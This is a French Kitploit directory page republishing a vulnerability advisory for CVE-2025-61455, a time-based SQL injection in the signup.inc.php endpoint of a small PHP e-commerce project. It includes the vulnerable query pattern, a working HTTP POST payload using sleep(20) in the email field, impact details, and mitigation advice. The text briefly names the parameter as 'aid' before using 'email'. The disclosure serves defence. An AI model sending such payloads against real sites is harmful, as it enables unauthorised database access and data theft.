Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-61455 — Divulgation publique et preuve de concept pour CVE-2025-61455, une injection SQL critique dans E-commerce Project v1.0, incluant les détails techniques, le PoC et les recommandations d'atténuation. | Kitploit
Outils/GitHubGitHub/tansique-17/cve-2025-61455
Analyse des VulnérabilitésExploitationSécurité WebApprentissage et ÉducationRessources Organisées
GitHubtansique-17/cve-2025-61455

CVE-2025-61455

Divulgation publique et preuve de concept pour CVE-2025-61455, une injection SQL critique dans E-commerce Project v1.0, incluant les détails techniques, le PoC et les recommandations d'atténuation.

Voir le dépôt
il y a 10 moisPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ Divulgation de CVE : CVE-2025-61455 — Injection SQL dans un projet e-commerce

Date de divulgation : 14 octobre 2025
Identifiant CVE : CVE-2025-61455
Sévérité : CRITIQUE (CVSS 9.8)


🧩 Résumé

Une vulnérabilité critique d'injection SQL existe dans E-commerce Project v1.0, plus précisément au niveau du point de terminaison signup.inc.php. L'application intègre directement des entrées utilisateur non assainies dans les requêtes SQL, permettant à des attaquants non authentifiés de contourner l'authentification et d'exécuter des commandes SQL arbitraires.

Ce problème a reçu l'identifiant CVE-2025-61455. Au moment de la divulgation publique, aucun correctif officiel n'était disponible.


📦 Produit concerné

  • Vendeur : Indépendant (Bhabishya-123)
  • Projet : E-commerce
  • Version : v1.0
  • Fichier : signup.inc.php
  • Point de terminaison vulnérable :
    https://localhost/e-commerce-main/includes/signup.inc.php

  • 🔬 Détails de la vulnérabilité

    L'application utilise des entrées non assainies directement dans les requêtes SQL, sans validation des entrées ni requêtes préparées. La vulnérabilité existe dans le paramètre aid du fichier signup.inc.php.

    Un attaquant peut injecter du code SQL malveillant via le paramètre email, permettant des attaques d'injection SQL aveugle basées sur le temps.

    Exemple de modèle de code vulnérable :

    root@kitploit:~
    $query = "SELECT * FROM table WHERE email='$email'";
    

    Cela permet des charges utiles d'injection capables de manipuler la logique des requêtes et d'extraire des données sensibles.


    📌 Classification CWE

    Identifiant CWETitre
    CWE-89Neutralisation inappropriée d'éléments spéciaux utilisés dans une commande SQL

    📊 Score CVSS v3.1

    ScoreSévéritéChaîne vectorielle
    9.8CRITIQUECVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

    💥 Impact

    Une exploitation réussie pourrait entraîner :

    • ✅ Contournement complet de l'authentification
    • 🔓 Accès non autorisé aux fonctionnalités privilégiées
    • 📊 Exfiltration de données via une injection SQL aveugle basée sur le temps
    • 🛠️ Manipulation ou suppression de données potentielle
    • ⚠️ Compromission complète de la base de données backend
    • 💻 Potentiel d'exécution de code à distance

    🧪 Preuve de concept (PoC)

    1. Cloner le dépôt

    root@kitploit:~
    git clone https://github.com/Bhabishya-123/E-commerce.git
    

    2. Héberger localement

    Utilisez XAMPP/LAMP pour déployer le projet et accédez à :

    root@kitploit:~
    http://localhost/e-commerce-main/includes/signup.inc.php
    

    3. Injection de la charge utile

    Envoyez la requête HTTP malveillante suivante :

    root@kitploit:~
    POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    
    name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
    

    Explication :
    Le paramètre email contient une charge utile d'injection SQL basée sur le temps : '+(select*from(select(sleep(20)))a)+'

    Si l'application retarde la réponse de 20 secondes, l'injection SQL est réussie.


    🔐 Recommandations

    • ✅ Remplacez les requêtes SQL dynamiques par des requêtes préparées (mysqli_prepare() ou PDO).
    • 🔍 Effectuez une validation et un assainissement des entrées pour toutes les entrées utilisateur.
    • 🧱 Déployez un pare-feu applicatif web (WAF) pour bloquer les modèles d'injection SQL connus.
    • 🛡️ Menez des audits de code réguliers et des tests d'intrusion pour une détection précoce.
    • 🔒 Implémentez des requêtes paramétrées pour toutes les interactions avec la base de données.
    • 📝 Utilisez des listes d'autorisation pour la validation des entrées lorsque c'est possible.

    📆 Chronologie

    ÉvénementDate
    Vulnérabilité découverte16 septembre 2025
    Divulgation publique13 octobre 2025
    Correctif disponible❌ Non disponible au moment de la divulgation

    🙋‍♂️ Crédits

    Cette vulnérabilité a été découverte et divulguée de manière responsable par :

    Tansique Dasari
    🔗 GitHub
    ✉️ [email protected]


    🔗 Références

    • OWASP - Injection SQL
    • PortSwigger - Injection SQL
    • CVE-2025-61455 sur CVE.org

    💬 Cet avis est publié de manière indépendante en raison de l'absence de réponse du vendeur.

    Télécharger l’outil